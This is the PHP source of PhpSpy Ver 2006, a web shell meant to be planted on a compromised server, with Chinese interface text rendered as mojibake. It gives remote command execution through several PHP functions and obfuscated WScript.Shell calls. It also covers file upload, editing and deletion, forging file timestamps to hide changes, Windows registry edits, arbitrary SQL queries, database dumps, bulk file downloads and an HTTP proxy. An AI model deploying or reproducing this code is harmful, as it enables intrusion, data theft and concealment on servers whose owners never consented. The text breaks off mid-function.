PhpSpy Ver 2006

"; echo "ע��ɹ�......

��Զ��˳��򵥻��˳�� >>>"; exit; } if ($_POST['do'] == 'login') { $thepass=trim($_POST['adminpass']); if ($admin['pass'] == $thepass) { setcookie ("adminpass",$thepass,time()+(1*24*3600)); echo ""; echo "��½�ɹ�......

��Զ��ת�򵥻�� >>>"; exit; } } if (isset($_COOKIE['adminpass'])) { if ($_COOKIE['adminpass'] != $admin['pass']) { loginpage(); } } else { loginpage(); } } /*===================== ��֤�� =====================*/ // �ж� magic_quotes_gpc ״̬ if (get_magic_quotes_gpc()) { $_GET = stripslashes_array($_GET); $_POST = stripslashes_array($_POST); } // �鿴PHPINFO if ($_GET['action'] == "phpinfo") { echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() ��ѱ��,��鿴<PHP��>"; exit; } // ��ߴ�� if (isset($_POST['url'])) { $proxycontents = @file_get_contents($_POST['url']); echo ($proxycontents) ? $proxycontents : "

��ȡ URL ��ʧ��

"; exit; } // ��ļ� if (!empty($downfile)) { if (!@file_exists($downfile)) { echo ""; } else { $filename = basename($downfile); $filename_info = explode('.', $filename); $fileext = $filename_info[count($filename_info)-1]; header('Content-type: application/x-'.$fileext); header('Content-Disposition: attachment; filename='.$filename); header('Content-Description: PHP Generated Data'); header('Content-Length: '.filesize($downfile)); @readfile($downfile); exit; } } // ֱ��ر��ݿ� if ($_POST['backuptype'] == 'download') { @mysql_connect($servername,$dbusername,$dbpassword) or die("��ݿ��ʧ��"); @mysql_select_db($dbname) or die("ѡ��ݿ�ʧ��"); $table = array_flip($_POST['table']); $result = mysql_query("SHOW tables"); echo ($result) ? NULL : "��: ".mysql_error(); $filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql"); header('Content-type: application/unknown'); header('Content-Disposition: attachment; filename='.$filename); $mysqldata = ''; while ($currow = mysql_fetch_array($result)) { if (isset($table[$currow[0]])) { $mysqldata.= sqldumptable($currow[0]); $mysqldata.= $mysqldata."\r\n"; } } mysql_close(); exit; } // ��Ŀ¼ $pathname=str_replace('\\','/',dirname(__FILE__)); // ��ȡ��ǰ·�� if (!isset($dir) or empty($dir)) { $dir = "."; $nowpath = getPath($pathname, $dir); } else { $dir=$_GET['dir']; $nowpath = getPath($pathname, $dir); } // �ж϶�д�� $dir_writeable = (dir_writeable($nowpath)) ? "��д" : "��д"; $phpinfo=(!eregi("phpinfo",$dis_func)) ? " | PHPINFO()" : ""; $reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | ע��" : ""; $tb = new FORMS; ?> PhpSpy Ver 2006 tableheader(); $tb->tdbody('

'.$_SERVER['HTTP_HOST'].'

'.$_SERVER['REMOTE_ADDR'].'

headerform(array('method'=>'GET','content'=>'

��·��: '.$pathname.'
��ǰĿ¼('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'
��תĿ¼: '.$tb->makeinput('dir').' '.$tb->makeinput('','ȷ��','','submit').' ��֧�־��·��·��')); $tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'�ϴ��ļ��ǰĿ¼: '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','ȷ��','','submit').$tb->makeinput('uploaddir',$dir,'','hidden'))); $tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>'�½��ļ��ڵ�ǰĿ¼: '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile','ȷ��','','submit'))); $tb->headerform(array('content'=>'�½�Ŀ¼�ڵ�ǰĿ¼: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','ȷ��','','submit'))); ?>

\n"; // ɾ��ļ� if (!empty($delfile)) { if (file_exists($delfile)) { echo (@unlink($delfile)) ? $delfile." ɾ��ɹ�!" : "�ļ�ɾ��ʧ��!"; } else { echo basename($delfile)." �ļ��Ѳ��!"; } } // ɾ��Ŀ¼ elseif (!empty($deldir)) { $deldirs="$dir/$deldir"; if (!file_exists("$deldirs")) { echo "$deldir Ŀ¼�Ѳ��!"; } else { echo (deltree($deldirs)) ? "Ŀ¼ɾ��ɹ�!" : "Ŀ¼ɾ��ʧ��!"; } } // ��Ŀ¼ elseif (($createdirectory) AND !empty($_POST['newdirectory'])) { if (!empty($newdirectory)) { $mkdirs="$dir/$newdirectory"; if (file_exists("$mkdirs")) { echo "��Ŀ¼�Ѵ��!"; } else { echo (@mkdir("$mkdirs",0777)) ? "��Ŀ¼�ɹ�!" : "��ʧ��!"; @chmod("$mkdirs",0777); } } } // �ϴ��ļ� elseif ($doupfile) { echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "�ϴ��ɹ�!" : "�ϴ�ʧ��!"; } // �༭�ļ� elseif ($_POST['do'] == 'doeditfile') { if (!empty($_POST['editfilename'])) { $filename="$editfilename"; @$fp=fopen("$filename","w"); echo $msg=@fwrite($fp,$_POST['filecontent']) ? "д��ļ��ɹ�!" : "д��ʧ��!"; @fclose($fp); } else { echo "��Ҫ�༭��ļ��!"; } } // �༭�ļ�� elseif ($_POST['do'] == 'editfileperm') { if (!empty($_POST['fileperm'])) { $fileperm=base_convert($_POST['fileperm'],8,10); echo (@chmod($dir."/".$file,$fileperm)) ? "��޸ĳɹ�!" : "�޸�ʧ��!"; echo " �ļ� ".$file." �޸ĺ��Ϊ: ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4); } else { echo "��Ҫ��õ��!"; } } // �ļ�� elseif ($_POST['do'] == 'rename') { if (!empty($_POST['newname'])) { $newname=$_POST['dir']."/".$_POST['newname']; if (@file_exists($newname)) { echo "".$_POST['newname']." �Ѿ��,��һ��!"; } else { echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])." �ɹ��Ϊ ".$_POST['newname']." !" : "�ļ��޸�ʧ��!"; } } else { echo "��Ҫ�ĵ��ļ��!"; } } // ��¡ʱ�� elseif ($_POST['do'] == 'domodtime') { if (!@file_exists($_POST['curfile'])) { echo "Ҫ�޸ĵ��ļ��!"; } else { if (!@file_exists($_POST['tarfile'])) { echo "Ҫ��յ��ļ��!"; } else { $time=@filemtime($_POST['tarfile']); echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." ��޸�ʱ��ɹ��Ϊ ".date("Y-m-d H:i:s",$time)." !" : "�ļ��޸�ʱ��޸�ʧ��!"; } } } // �Զ��ʱ�� elseif ($_POST['do'] == 'modmytime') { if (!@file_exists($_POST['curfile'])) { echo "Ҫ�޸ĵ��ļ��!"; } else { $year=$_POST['year']; $month=$_POST['month']; $data=$_POST['data']; $hour=$_POST['hour']; $minute=$_POST['minute']; $second=$_POST['second']; if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) { $time=strtotime("$data $month $year $hour:$minute:$second"); echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." ��޸�ʱ��ɹ��Ϊ ".date("Y-m-d H:i:s",$time)." !" : "�ļ��޸�ʱ��޸�ʧ��!"; } } } // ��MYSQL elseif ($connect) { if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) { echo "��ݿ��ӳɹ�!"; mysql_close(); } else { echo mysql_error(); } } // ִ��SQL�� elseif ($_POST['do'] == 'query') { @mysql_connect($servername,$dbusername,$dbpassword) or die("��ݿ��ʧ��"); @mysql_select_db($dbname) or die("ѡ��ݿ�ʧ��"); $result = @mysql_query($_POST['sql_query']); echo ($result) ? "SQL��ɹ�ִ��!" : "��: ".mysql_error(); mysql_close(); } // ��ݲ�� elseif ($_POST['do'] == 'backupmysql') { if (empty($_POST['table']) OR empty($_POST['backuptype'])) { echo "��ѡ��ݵ��ݱ��ͱ��ݷ�ʽ!"; } else { if ($_POST['backuptype'] == 'server') { @mysql_connect($servername,$dbusername,$dbpassword) or die("��ݿ��ʧ��"); @mysql_select_db($dbname) or die("ѡ��ݿ�ʧ��"); $table = array_flip($_POST['table']); $filehandle = @fopen($path,"w"); if ($filehandle) { $result = mysql_query("SHOW tables"); echo ($result) ? NULL : "��: ".mysql_error(); while ($currow = mysql_fetch_array($result)) { if (isset($table[$currow[0]])) { sqldumptable($currow[0], $filehandle); fwrite($filehandle,"\n\n\n"); } } fclose($filehandle); echo "��ݿ��ѳɹ��ݵ� ".$path.""; mysql_close(); } else { echo "��ʧ��,��ȷ��Ŀ��ļ��Ƿ��п�дȨ��!"; } } } } // �� PS:�ļ�̫��ܷǳ�� // Thx : С�� elseif($downrar) { if (!empty($dl)) { $dfiles=""; foreach ($dl AS $filepath=>$value) { $dfiles.=$filepath.","; } $dfiles=substr($dfiles,0,strlen($dfiles)-1); $dl=explode(",",$dfiles); $zip=new PHPZip($dl); $code=$zip->out; header("Content-type: application/octet-stream"); header("Accept-Ranges: bytes"); header("Accept-Length: ".strlen($code)); header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."_Files.tar.gz"); echo $code; exit; } else { echo "��ѡ��Ҫ��ص��ļ�!"; } } // Shell.Application ��г�� elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) { $shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion'); $a = $shell->ShellExecute($_POST['program'],$_POST['prog']); echo ($a=='0') ? "��Ѿ��ɹ�ִ��!" : "��ʧ��!"; } // �鿴PHP��ò��״�� elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) { echo "��ò�� ".$_POST['phpvarname']." ��: ".getphpcfg($_POST['phpvarname']).""; } // ��ȡע�� elseif(($regread) AND !empty($_POST['readregname'])) { $shell= &new COM('WSc'.'rip'.'t.Sh'.'ell'); var_dump(@$shell->RegRead($_POST['readregname'])); } // д��ע�� elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) { $shell= &new COM('W'.'Scr'.'ipt.S'.'hell'); $a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']); echo ($a=='0') ? "д��ע��ֵ�ɹ�!" : "д�� ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST['regtype']." ʧ��!"; } // ɾ��ע�� elseif(($regdelete) AND !empty($_POST['delregname'])) { $shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll'); $a = @$shell->RegDelete($_POST['delregname']); echo ($a=='0') ? "ɾ��ע��ֵ�ɹ�!" : "ɾ�� ".$_POST['delregname']." ʧ��!"; } else { echo "�� Security Angel С�� angel [BST] ��,�� www.4ngel.net ��°汾."; } echo "

\n"; /*===================== ִ�в�� =====================*/ if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) { $tb->tableheader(); ?> �ļ� �� ��޸� ��С �� �� \n"; echo " [$file]\n"; echo " $ctime\n"; echo " $mtime\n"; echo " <dir>\n"; echo " $dirperm\n"; echo " ɾ��\n"; echo "\n"; $dir_i++; } else { if($file=="..") { echo "\n"; echo " ��ϼ�Ŀ¼\n"; echo "\n"; } } } }// while @closedir($dirs); ?> \n"; echo "\n"; }// end dir elseif ($_GET['action'] == "editfile") { if(empty($newfile)) { $filename="$dir/$editfile"; $fp=@fopen($filename,"r"); $contents=@fread($fp, filesize($filename)); @fclose($fp); $contents=htmlspecialchars($contents); }else{ $editfile=$newfile; $filename = "$dir/$editfile"; } $action = "?dir=".urlencode($dir)."&editfile=".$editfile; $tb->tableheader(); $tb->formheader($action,'�½�/�༭�ļ�'); $tb->tdbody('��ǰ�ļ�: '.$tb->makeinput('editfilename',$filename).' ��ļ��ļ�'); $tb->tdbody($tb->maketextarea('filecontent',$contents)); $tb->makehidden('do','doeditfile'); $tb->formfooter('1','30'); }//end editfile elseif ($_GET['action'] == "rename") { $nowfile = (isset($_POST['newname'])) ? $_POST['newname'] : basename($_GET['fname']); $action = "?dir=".urlencode($dir)."&fname=".urlencode($fname); $tb->tableheader(); $tb->formheader($action,'�޸��ļ��'); $tb->makehidden('oldname',$dir."/".$nowfile); $tb->makehidden('dir',$dir); $tb->tdbody('��ǰ�ļ��: '.basename($nowfile)); $tb->tdbody('��Ϊ: '.$tb->makeinput('newname')); $tb->makehidden('do','rename'); $tb->formfooter('1','30'); }//end rename elseif ($_GET['action'] == "fileperm") { $action = "?dir=".urlencode($dir)."&file=".$file; $tb->tableheader(); $tb->formheader($action,'�޸��ļ��'); $tb->tdbody('�޸� '.$file.' ��Ϊ: '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10,8),-4))); $tb->makehidden('file',$file); $tb->makehidden('dir',urlencode($dir)); $tb->makehidden('do','editfileperm'); $tb->formfooter('1','30'); }//end fileperm elseif ($_GET['action'] == "newtime") { $action = "?dir=".urlencode($dir); $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12); $tb->tableheader(); $tb->formheader($action,'��¡�ļ��޸�ʱ��'); $tb->tdbody("�޸��ļ�: ".$tb->makeinput('curfile',$file,'readonly')." �� Ŀ��ļ�: ".$tb->makeinput('tarfile','��·��ļ��'),'center','2','30'); $tb->makehidden('do','domodtime'); $tb->formfooter('','30'); $tb->formheader($action,'�Զ��ļ��޸�ʱ��'); $tb->tdbody('

��Ч��ʱ��ͷ�Χ�ǴӸ��ʱ�� 1901 �� 12 �� 13 �� 20:45:54 �� 2038�� 1 �� 19 �� ڶ� 03:14:07
(��ڸ�� 32 λ�з��Сֵ��ֵ��)
˵��: ��ȡ 01 �� 30 ֮��, ʱȡ 0 �� 24 ֮��, �ֺ��ȡ 0 �� 60 ֮��!

','left'); $tb->tdbody('��ǰ�ļ��: '.$file); $tb->makehidden('curfile',$file); $tb->tdbody('�޸�Ϊ: '.$tb->makeinput('year','1984','','text','4').' �� '.$tb->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).' �� '.$tb->makeinput('data','18','','text','2').' �� '.$tb->makeinput('hour','20','','text','2').' ʱ '.$tb->makeinput('minute','00','','text','2').' �� '.$tb->makeinput('second','00','','text','2').' ��','center','2','30'); $tb->makehidden('do','modmytime'); $tb->formfooter('1','30'); }//end newtime elseif ($_GET['action'] == "shell") { $action = "??action=shell&dir=".urlencode($dir); $tb->tableheader(); $tb->tdheader('WebShell Mode'); if (substr(PHP_OS, 0, 3) == 'WIN') { $program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe"; $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt"; echo "\n"; } echo "

\n"; $tb->tdbody('��ʾ:��ȫ,��д��ļ�.��Եõ�ȫ��.'); $execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen'); $tb->tdbody('ѡ��ִ�к��: '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' ��: '.$tb->makeinput('command',$_POST['command'],'','text','60').' '.$tb->makeinput('','Run','','submit')); ?>

<?php
	if (!empty($_POST['command'])) {
		if ($execfunc=="system") {
			system($_POST['command']);
		} elseif ($execfunc=="passthru") {
			passthru($_POST['command']);
		} elseif ($execfunc=="exec") {
			$result = exec($_POST['command']);
			echo $result;
		} elseif ($execfunc=="shell_exec") {
			$result=shell_exec($_POST['command']);
			echo $result;	
		} elseif ($execfunc=="popen") {
			$pp = popen($_POST['command'], 'r');
			$read = fread($pp, 2096);
			echo $read;
			pclose($pp);
		} elseif ($execfunc=="wscript") {
			$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed");
			$exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command']."");
			$stdout = $exec->StdOut();
			$stroutput = $stdout->ReadAll();
			echo $stroutput;
		} else {
			system($_POST['command']);
		}
	}
	?>

tableheader(); $tb->formheader($action,'��ȡע��'); $tb->tdbody('��ֵ: '.$tb->makeinput('readregname',$regname,'','text','100').' '.$tb->makeinput('regread','��ȡ','','submit'),'center','2','50'); echo ""; $tb->formheader($action,'д��ע��'); $cacheregtype = array('REG_SZ'=>'REG_SZ','REG_BINARY'=>'REG_BINARY','REG_DWORD'=>'REG_DWORD','REG_MULTI_SZ'=>'REG_MULTI_SZ','REG_EXPAND_SZ'=>'REG_EXPAND_SZ'); $tb->tdbody('��ֵ: '.$tb->makeinput('writeregname',$registre,'','text','56').' ��: '.$tb->makeselect(array('name'=>'regtype','option'=>$cacheregtype,'selected'=>$regtype)).' ֵ: '.$tb->makeinput('regval',$regval,'','text','15').' '.$tb->makeinput('regwrite','д��','','submit'),'center','2','50'); echo ""; $tb->formheader($action,'ɾ��ע��'); $tb->tdbody('��ֵ: '.$tb->makeinput('delregname',$delregname,'','text','100').' '.$tb->makeinput('regdelete','ɾ��','','submit'),'center','2','50'); echo ""; $tb->tablefooter(); }//end reg elseif ($_GET['action'] == "proxy") { $action = '?action=proxy'; $tb->tableheader(); $tb->formheader($action,'��ߴ��','proxyframe'); $tb->tdbody('

�ñ��ܽ�ʵ�ּ򵥵� HTTP ��,��ʾʹ��·��ͼƬ��Ӽ�CSS��ʽ��.
�ñ��ܿ��ͨ��Ŀ��URL,��֧�� SQL Injection ̽��Լ�ĳЩ��ַ�.
�ñ�� URL,��Ŀ��µ�IP��¼�� : '.$_SERVER['REMOTE_ADDR'].'

','left'); $tb->tdbody('URL: '.$tb->makeinput('url','http://www.4ngel.net','','text','100').' '.$tb->makeinput('','��','','submit'),'center','1','40'); $tb->tdbody(''); echo ""; $tb->tablefooter(); }//end proxy elseif ($_GET['action'] == "sql") { $action = '?action=sql'; $servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost'; $dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root'; $dbpassword = $_POST['dbpassword']; $dbname = $_POST['dbname']; $sql_query = $_POST['sql_query']; $tb->tableheader(); $tb->formheader($action,'ִ�� SQL ��'); $tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','��','','submit')); $tb->tdbody($tb->maketextarea('sql_query',$sql_query,'85','10')); $tb->makehidden('do','query'); $tb->formfooter('1','30'); }//end sql query elseif ($_GET['action'] == "sqlbak") { $action = '?action=sqlbak'; $servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost'; $dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root'; $dbpassword = $_POST['dbpassword']; $dbname = $_POST['dbname']; $tb->tableheader(); $tb->formheader($action,'�� MySQL ��ݿ�'); $tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','��','','submit')); @mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname); $tables = @mysql_list_tables($dbname); while ($table = @mysql_fetch_row($tables)) { $cachetables[$table[0]] = $table[0]; } @mysql_free_result($tables); if (empty($cachetables)) { $tb->tdbody('��û��ݿ� or ��ǰ��ݿ�û��κ��ݱ�'); } else { $tb->tdbody('

��ѡ��:	'.$tb->makeselect(array('name'=>'table[]','option'=>$cachetables,'multiple'=>1,'size'=>15,'css'=>1)).'
��·��:	'.$tb->makeinput('path',$pathname.'/'.$_SERVER['HTTP_HOST'].'_MySQL.sql','','text','50').'
ֱ��ص�� (�ʺ��С��ݿ�)

'); $tb->makehidden('do','backupmysql'); $tb->formfooter('0','30'); } $tb->tablefooter(); @mysql_close(); }//end sql backup elseif ($_GET['action'] == "phpenv") { $upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "��ϴ�"; $adminmail=(isset($_SERVER['SERVER_ADMIN'])) ? "".$_SERVER['SERVER_ADMIN']."" : "".get_cfg_var("sendmail_from").""; if ($dis_func == "") { $dis_func = "No"; }else { $dis_func = str_replace(" ","
",$dis_func); $dis_func = str_replace(",","
",$dis_func); } $phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No"; $info = array( 0 => array("��ʱ��",date("Y��m��d�� h:i:s",time())), 1 => array("��","".$_SERVER['SERVER_NAME'].""), 2 => array("��IP��ַ",gethostbyname($_SERVER['SERVER_NAME'])), 3 => array("��ϵͳ",PHP_OS), 5 => array("��ϵͳ��ֱ��",$_SERVER['HTTP_ACCEPT_LANGUAGE']), 6 => array("��",$_SERVER['SERVER_SOFTWARE']), 7 => array("Web��˿�",$_SERVER['SERVER_PORT']), 8 => array("PHP��з�ʽ",strtoupper(php_sapi_name())), 9 => array("PHP�汾",PHP_VERSION), 10 => array("��ڰ�ȫģʽ",getphpcfg("safemode")), 11 => array("��Ա",$adminmail), 12 => array("��ļ�·��",__FILE__), 13 => array("��ʹ�� URL ��ļ� allow_url_fopen",getphpcfg("allow_url_fopen")), 14 => array("��̬��ӿ� enable_dl",getphpcfg("enable_dl")), 15 => array("��ʾ��Ϣ display_errors",getphpcfg("display_errors")), 16 => array("�Զ��ȫ�ֱ�� register_globals",getphpcfg("register_globals")), 17 => array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc")), 18 => array("��ʹ��ڴ�� memory_limit",getphpcfg("memory_limit")), 19 => array("POST��ֽ�� post_max_size",getphpcfg("post_max_size")), 20 => array("��ϴ��ļ� upload_max_filesize",$upsize), 21 => array("����ʱ�� max_execution_time",getphpcfg("max_execution_time")."��"), 22 => array("��õĺ�� disable_functions",$dis_func), 23 => array("phpinfo()",$phpinfo), 24 => array("Ŀǰ��п��ռ�diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'), 25 => array("ͼ�δ�� GD Library",getfun("imageline")), 26 => array("IMAP��ʼ�ϵͳ",getfun("imap_close")), 27 => array("MySQL��ݿ�",getfun("mysql_close")), 28 => array("SyBase��ݿ�",getfun("sybase_close")), 29 => array("Oracle��ݿ�",getfun("ora_close")), 30 => array("Oracle 8 ��ݿ�",getfun("OCILogOff")), 31 => array("PREL��﷨ PCRE",getfun("preg_match")), 32 => array("PDF�ĵ�֧��",getfun("pdf_close")), 33 => array("Postgre SQL��ݿ�",getfun("pg_close")), 34 => array("SNMP��Э��",getfun("snmpget")), 35 => array("ѹ��ļ�֧��(Zlib)",getfun("gzclose")), 36 => array("XML��",getfun("xml_set_object")), 37 => array("FTP",getfun("ftp_login")), 38 => array("ODBC��ݿ��",getfun("odbc_close")), 39 => array("Session֧��",getfun("session_start")), 40 => array("Socket֧��",getfun("fsockopen")), ); $tb->tableheader(); echo "\n"; $hp = array(0=> '��', 1=> 'PHP��', 2=> '��֧��״��'); for ($a=0;$a<3;$a++) { $tb->tdbody(''.$hp[1].'','left','1','30','style="padding-left: 5px;"'); ?> \n"; } } elseif ($a == 1) { for ($i=13;$i<=24;$i++) { echo "\n"; } } elseif ($a == 2) { for ($i=25;$i<=40;$i++) { echo "\n"; } } ?>

".$info[$i][0]."	".$info[$i][1]."
".$info[$i][0]."	".$info[$i][1]."
".$info[$i][0]."	".$info[$i][1]."

"; }//end phpenv ?>

read()) { if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) { @chmod("$deldir/$file",0777); deltree("$deldir/$file"); } if (is_file("$deldir/$file")) { @chmod("$deldir/$file",0777); @unlink("$deldir/$file"); } } $mydir->close(); @chmod("$deldir",0777); return (@rmdir($deldir)) ? 1 : 0; } // �ж϶�д�� function dir_writeable($dir) { if (!is_dir($dir)) { @mkdir($dir, 0777); } if(is_dir($dir)) { if ($fp = @fopen("$dir/test.txt", 'w')) { @fclose($fp); @unlink("$dir/test.txt"); $writeable = 1; } else { $writeable = 0; } } return $writeable; } // ��м�ı��ɫ�滻 function getrowbg() { global $bgcounter; if ($bgcounter++%2==0) { return "firstalt"; } else { return "secondalt"; } } // ��ȡ��ǰ��ļ�ϵͳ·�� function getPath($mainpath, $relativepath) { global $dir; $mainpath_info = explode('/', $mainpath); $relativepath_info = explode('/', $relativepath); $relativepath_info_count = count($relativepath_info); for ($i=0; $i<$relativepath_info_count; $i++) { if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue; if ($relativepath_info[$i] == '..') { $mainpath_info_count = count($mainpath_info); unset($mainpath_info[$mainpath_info_count-1]); continue; } $mainpath_info[count($mainpath_info)] = $relativepath_info[$i]; } //end for return implode('/', $mainpath_info); } // ��PHP��ò�� function getphpcfg($varname) { switch($result = get_cfg_var($varname)) { case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break; } } // ��麯�� function getfun($funName) { return (false !== function_exists($funName)) ? "Yes" : "No"; } // ѹ�� class PHPZip{ var $out=''; function PHPZip($dir) { if (@function_exists('gzcompress')) { $curdir = getcwd(); if (is_array($dir)) $filelist = $dir; else{ $filelist=$this -> GetFileList($dir);//�ļ��б� foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1); } if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir); else chdir($curdir); if (count($filelist)>0){ foreach($filelist as $filename){ if (is_file($filename)){ $fd = fopen ($filename, "r"); $content = @fread ($fd, filesize ($filename)); fclose ($fd); if (is_array($dir)) $filename = basename($filename); $this -> addFile($content, $filename); } } $this->out = $this -> file(); chdir($curdir); } return 1; } else return 0; } // ��ָ��Ŀ¼�ļ��б� function GetFileList($dir){ static $a; if (is_dir($dir)) { if ($dh = opendir($dir)) { while (($file = readdir($dh)) !== false) { if($file!='.' && $file!='..'){ $f=$dir .'/'. $file; if(is_dir($f)) $this->GetFileList($f); $a[]=$f; } } closedir($dh); } } return $a; } var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } // end if return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function addFile($data, $name, $time = 0) { $name = str_replace('\\', '/', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "\x50\x4b\x03\x04"; $fr .= "\x14\x00"; $fr .= "\x00\x00"; $fr .= "\x08\x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $c_len = strlen($zdata); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $this -> datasec[] = $fr; $new_offset = strlen(implode('', $this->datasec)); $cdrec = "\x50\x4b\x01\x02"; $cdrec .= "\x00\x00"; $cdrec .= "\x14\x00"; $cdrec .= "\x00\x00"; $cdrec .= "\x08\x00"; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; } } // ��ݿ� function sqldumptable($table, $fp=0) { $tabledump = "DROP TABLE IF EXISTS $table;\n"; $tabledump .= "CREATE TABLE $table (\n"; $firstfield=1; $fields = mysql_query("SHOW FIELDS FROM $table"); while ($field = mysql_fetch_array($fields)) { if (!$firstfield) { $tabledump .= ",\n"; } else { $firstfield=0; } $tabledump .= " $field[Field] $field[Type]"; if (!empty($field["Default"])) { $tabledump .= " DEFAULT '$field[Default]'"; } if ($field['Null'] != "YES") { $tabledump .= " NOT NULL"; } if ($field['Extra'] != "") { $tabledump .= " $field[Extra]"; } } mysql_free_result($fields); $keys = mysql_query("SHOW KEYS FROM $table"); while ($key = mysql_fetch_array($keys)) { $kname=$key['Key_name']; if ($kname != "PRIMARY" and $key['Non_unique'] == 0) { $kname="UNIQUE|$kname"; } if(!is_array($index[$kname])) { $index[$kname] = array(); } $index[$kname][] = $key['Column_name']; } mysql_free_result($keys); while(list($kname, $columns) = @each($index)) { $tabledump .= ",\n"; $colnames=implode($columns,","); if ($kname == "PRIMARY") { $tabledump .= " PRIMARY KEY 